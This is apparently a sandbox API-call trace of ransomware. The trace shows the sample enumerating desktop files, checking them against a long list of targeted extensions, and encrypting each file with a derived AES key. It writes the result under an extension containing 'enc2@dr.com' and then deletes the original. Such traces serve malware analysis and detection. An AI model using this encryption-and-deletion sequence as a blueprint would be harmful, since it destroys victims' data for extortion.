	[0183.083] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 105
	[0183.083] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.085] WriteFile (in: hFile=0x39c, lpBuffer=0xfe80c0*, nNumberOfBytesToWrite=0x9f30, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe80c0*, lpNumberOfBytesWritten=0x18a648*=0x9f30, lpOverlapped=0x0) returned 1
	[0183.090] CloseHandle (hObject=0x39c) returned 1
	[0183.090] CloseHandle (hObject=0x390) returned 1
	[0183.090] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv")) returned 1
	[0183.099] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv")) returned 0
	[0183.100] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa624b620, ftCreationTime.dwHighDateTime=0x1d96762, ftLastAccessTime.dwLowDateTime=0x345f11d0, ftLastAccessTime.dwHighDateTime=0x1d97148, ftLastWriteTime.dwLowDateTime=0x345f11d0, ftLastWriteTime.dwHighDateTime=0x1d97148, nFileSizeHigh=0x0, nFileSizeLow=0x12f3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQgw.jpg", cAlternateFileName="")) returned 1
	[0183.100] lstrcmpW (lpString1="EQgw.jpg", lpString2="..") returned 1
	[0183.100] lstrcmpW (lpString1="EQgw.jpg", lpString2=".") returned 1
	[0183.100] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.100] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="EQgw.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\EQgw.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\EQgw.jpg"
	[0183.100] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\EQgw.jpg") returned 56
	[0183.100] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.101] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\EQgw.jpg", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg") returned 0x38
	[0183.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.101] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.101] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg"
	[0183.101] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg") returned 56
	[0183.101] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.102] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0183.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.102] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.102] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.102] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.103] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.107] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x12f3d, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x12f3d, lpOverlapped=0x0) returned 1
	[0183.113] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.113] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb198) returned 1
	[0183.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.115] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.116] CryptHashData (hHash=0xfb9230, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.116] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9230, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9530) returned 1
	[0183.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.116] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x12f3d, dwBufLen=0x12f3d | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x12f40) returned 1
	[0183.119] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.119] RtlMoveMemory (in: Destination=0xff10d0, Source=0xfde188, Length=0x12f3d | out: Destination=0xff10d0) 
	[0183.119] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.119] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff10d0*, pdwDataLen=0x18a1ec*=0x12f3d, dwBufLen=0x12f40 | out: pbData=0xff10d0*, pdwDataLen=0x18a1ec*=0x12f40) returned 1
	[0183.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.122] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0183.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.123] CryptDestroyHash (hHash=0xfb9230) returned 1
	[0183.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.123] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0183.123] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.123] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.124] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0183.125] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 98
	[0183.125] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.127] WriteFile (in: hFile=0x39c, lpBuffer=0xff10d0*, nNumberOfBytesToWrite=0x12f40, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff10d0*, lpNumberOfBytesWritten=0x18a648*=0x12f40, lpOverlapped=0x0) returned 1
	[0183.132] CloseHandle (hObject=0x39c) returned 1
	[0183.132] CloseHandle (hObject=0x390) returned 1
	[0183.133] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg")) returned 1
	[0183.141] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\eqgw.jpg")) returned 0
	[0183.141] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a064c0, ftCreationTime.dwHighDateTime=0x1d97174, ftLastAccessTime.dwLowDateTime=0x9edc8440, ftLastAccessTime.dwHighDateTime=0x1d972d6, ftLastWriteTime.dwLowDateTime=0x9edc8440, ftLastWriteTime.dwHighDateTime=0x1d972d6, nFileSizeHigh=0x0, nFileSizeLow=0xdfad, dwReserved0=0x0, dwReserved1=0x0, cFileName="fbJW5D4nFaT2aDqd Tg.flv", cAlternateFileName="FBJW5D~1.FLV")) returned 1
	[0183.141] lstrcmpW (lpString1="fbJW5D4nFaT2aDqd Tg.flv", lpString2="..") returned 1
	[0183.150] lstrcmpW (lpString1="fbJW5D4nFaT2aDqd Tg.flv", lpString2=".") returned 1
	[0183.150] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.150] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="fbJW5D4nFaT2aDqd Tg.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\fbJW5D4nFaT2aDqd Tg.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\fbJW5D4nFaT2aDqd Tg.flv"
	[0183.150] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\fbJW5D4nFaT2aDqd Tg.flv") returned 71
	[0183.150] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.151] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\fbJW5D4nFaT2aDqd Tg.flv", cchLength=0x47 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv") returned 0x47
	[0183.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.151] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.151] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv"
	[0183.151] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\fbjw5d4nfat2adqd tg.flv") returned 71
	[0183.151] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.151] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.152] StrStrW (lpFirst=".flv", lpSrch=".") returned=".flv"
	[0183.152] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.152] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw